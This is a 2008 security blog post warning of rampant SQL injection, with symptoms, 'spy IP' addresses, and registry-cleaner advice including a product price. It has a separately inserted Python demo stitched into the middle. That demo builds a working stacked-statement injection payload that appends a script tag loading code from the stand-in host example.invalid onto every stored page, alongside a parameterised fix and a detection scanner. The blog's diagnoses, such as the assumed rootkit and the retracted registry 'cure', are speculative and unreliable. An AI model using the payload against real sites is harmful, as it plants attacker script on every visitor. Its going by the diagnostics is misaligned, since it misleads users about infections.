Internet Anthropologist Think Tank: Security Epidemic: SQL INJECTION


    Thursday, May 22, 2008

    Security Epidemic: SQL INJECTION




    Security: hyper-endemic Epidemic: SQL INJECTION, RAMPANT ON THE INTERNET
    SQL injection is an attack on a website's database, not on your PC directly: crafted input sent through a web form or URL gets run as part of the site's own SQL query. In the current campaigns that query stamps a hidden script tag onto the site's stored pages, so every visitor to those pages is pointed at the attacker's exploit server.
    THERE IS NO WAY TO KEEP THOSE INJECTED PAGES OUT OF YOUR BROWSER, BUT YOU CAN STOP THE CODE THEY LOAD FROM RUNNING.
    The risks and the threat have been underplayed by the media and security vendors.
    SQL injection is now
    ENDEMIC...
    Macs are vulnerable also.



    SECURITY WARNING: epidemic
    SQL INJECTION IS RAMPANT ON THE WWW, EVEN GOOGLE.
    Many Google search results now lead to injected pages.
    This program tests the links for free...
    ( USE THE GOOGLE LIST )
    HERE






    This threat is VERY SERIOUS.
    PARADIGM INTEL
    Currently it is profit-motivated, but the potential for other motives, the lack of prevention, and the inability of security vendors and Internet hubs to control SQL
    injection PUT the entire WWW at risk.
    Data we have collected:
    From Vista OS
    ( it got on to Vista )
    One we have seen tracks the victim to EVERY PAGE THEY VISIT.
    Spy IPs ( MAC ):
    66.197.241.55
    67.159.44.24

    SYMPTOMS:
    Excessive fan running and stopping, over and over.
    Svchost calls DLLs ( from an unknown source ) and attempts to run them.
    Excessive, repetitive spikes in CPU usage as it attempts to run the malicious DLLs.
    Vista:
    Related: ljizv8iy, and possibly FFAlert.dll; neither found with a Windows search of the hard drive.
    In logs, someone is surfing the same pages at the same times as you.

    SEARCH:
    NO hidden processes, files or folders found by F-Secure's BlackLight. ( smells of a rootkit )
    Ad-Aware 2007 and 2008 find nothing.
    Webroot anti-spyware and antivirus found nothing.
    McAfee Suite found nothing.


    Gerald
    Internet Anthropologist, ad Magnum

    Update:
    The rough number of SQL injected sites is around 1.5 million pages; in reality the number is much bigger, and there are several ongoing campaigns injecting obfuscated characters, making it a bit more time-consuming to track down. Who's behind these attacks? Besides the automation courtesy of botnets, the short answer is everyone with a decent SQL injector, and today's SQL injectors have built-in reconnaissance capabilities, like this one, which I assessed in a previous post.

    SOURCE: Dancho Danchev
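    To make concrete what "SQL injected sites" and "obfuscated characters" mean in the update above and in the warning at the top of this post, here is an added example in Python (not code from the original post, not Danchev's, and not any real injector): a mass SQL injection in miniature, modelled on the 2008 campaigns. A site search handler pastes the user's term into its SQL text and hands the result to a driver that runs stacked statements, as the ASP/MS SQL sites hit in 2008 did. One crafted term closes the intended query and appends an UPDATE that stamps an external script tag onto every stored article body, so every page rendered from that table now loads the attacker's script; the same term is inert when the query is parameterised. A small scanner then shows the idea behind the "test the links" tools: flag script tags whose host the site never used. The table, column names, rows, the site host news.example and the attacker host example.invalid are all constructed for the demo; the real campaigns hid the UPDATE inside a hex-encoded string and EXEC'd it (the obfuscation Danchev mentions), the plain form is used here so the SQL stays readable.

```python
"""Added example: mass SQL injection in miniature (constructed data only)."""
import re
import sqlite3
from urllib.parse import urlparse

TRUSTED_HOSTS = {"news.example"}                     # the site's own hosts (constructed)
ATTACKER_SCRIPT = "http://example.invalid/evil.js"   # constructed attacker host

# Attacker's "search term": close the LIKE literal, append an UPDATE that
# appends a script tag to every body, then open a harmless SELECT so the
# quote the application appends after the term still leaves valid SQL.
PAYLOAD = ("%'; UPDATE articles SET body = body || '<script src=\""
           + ATTACKER_SCRIPT + "\"></script>'; SELECT '")


def build_db() -> sqlite3.Connection:
    """In-memory 'news site' with two constructed articles."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles (title, body) VALUES
          ('Local election results', '<p>Turnout was 54 percent.</p>'),
          ('Weather warning', '<p>Heavy rain expected tonight.</p>');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, term: str) -> None:
    """The bug: SQL text built by concatenation and executed as a batch.
    executescript stands in for a driver that runs stacked statements, so
    whatever the attacker appended after the closing quote runs as well."""
    sql = "SELECT title FROM articles WHERE title LIKE '%" + term + "%';"
    con.executescript(sql)      # side effects only; results are discarded


def search_safe(con: sqlite3.Connection, term: str) -> list:
    """The fix: the term is bound as a parameter and never parsed as SQL."""
    rows = con.execute("SELECT title FROM articles WHERE title LIKE ?",
                       ("%" + term + "%",))
    return [title for (title,) in rows]


# External script tags: <script ... src="http(s)://host/...">
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']?(https?://[^\"'\s>]+)", re.I)


def find_injected_scripts(html: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    """Return script sources whose host is not on the site's own list."""
    return [src for src in SCRIPT_SRC.findall(html)
            if (urlparse(src).hostname or "") not in trusted_hosts]


def render(con: sqlite3.Connection, article_id: int) -> str:
    """What a visitor's browser receives for one article page."""
    title, body = con.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)).fetchone()
    return (f"<html><head><title>{title}</title>"
            f'<script src="http://news.example/site.js"></script></head>'
            f"<body>{body}</body></html>")


def count_tainted(con: sqlite3.Connection) -> int:
    """How many stored rows would make a rendered page load foreign script."""
    return sum(1 for (body,) in con.execute("SELECT body FROM articles")
               if find_injected_scripts(body))


def demo() -> dict:
    """Run the payload through both handlers and scan the outcome."""
    con = build_db()
    result = {"safe_results": search_safe(con, PAYLOAD),      # [] and no change
              "tainted_after_safe": count_tainted(con)}       # 0
    search_vulnerable(con, PAYLOAD)
    result["tainted_after_vulnerable"] = count_tainted(con)   # 2: every row
    result["page_hits"] = find_injected_scripts(render(con, 1))
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

    The scanner is the cheap client-side check: a page whose script tags point at a host the site does not own is the symptom a link tester looks for, and it will catch the plain form above. The injected pages in the wild wrapped the tag in obfuscated JavaScript, so a real checker has to evaluate or unpack the script rather than pattern-match the tag alone.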

    This is a threat to the WWW. G
    HOW:

    CYBERWAR's Pearl Harbour

    ( read the whole thing, all the updates. )

    Possible solutions: get control of rundll32.exe, and verify svchost.exe.
    A genuine svchost.exe lives in %SystemRoot%\System32 and carries a Microsoft signature; a copy running from any other folder is suspect. rundll32.exe itself is only a loader, so what matters is the DLL and entry point on its command line each time it fires, not the loader binary.
    Make recommendations in comments please. G

    UPDATE: 3:42 am EST
    The weakest link: NOT A LONG-TERM SOLUTION:
    Theory:
    Registry cleaning seems to clear everything up.
    We used Uniblue Reg Booster.
    $29.00; search for a coupon code, $19.00.
    It works, but we have been running Haute Secure.
    The reason this works might be that the registry was making connections to hidden files,
    but the reg cleaner could not see them and deleted the registry entries, thinking they were not valid, thereby disabling the attempted infection. Will be doing more testing.
    System seems to settle right down; fan quits running and no more continual CPU spikes.
    Spikes seem to be more normal. 8> THEY COME BACK.
    TURNING OFF GOOGLE ACCELERATOR FIXED THE PROBLEM OF SPIKES AND RUNDLL32.EXE
    RUNNING EVERY 4 SECONDS.

    Gerald


    1 Comment:

    Anonymous Anonymous said...

    Use the "NoScript" Firefox plugin and a proxy/SSH/VPN connection + "freeze" your computer.
    Stay frosty!
    Kind regards

    9:23 PM  
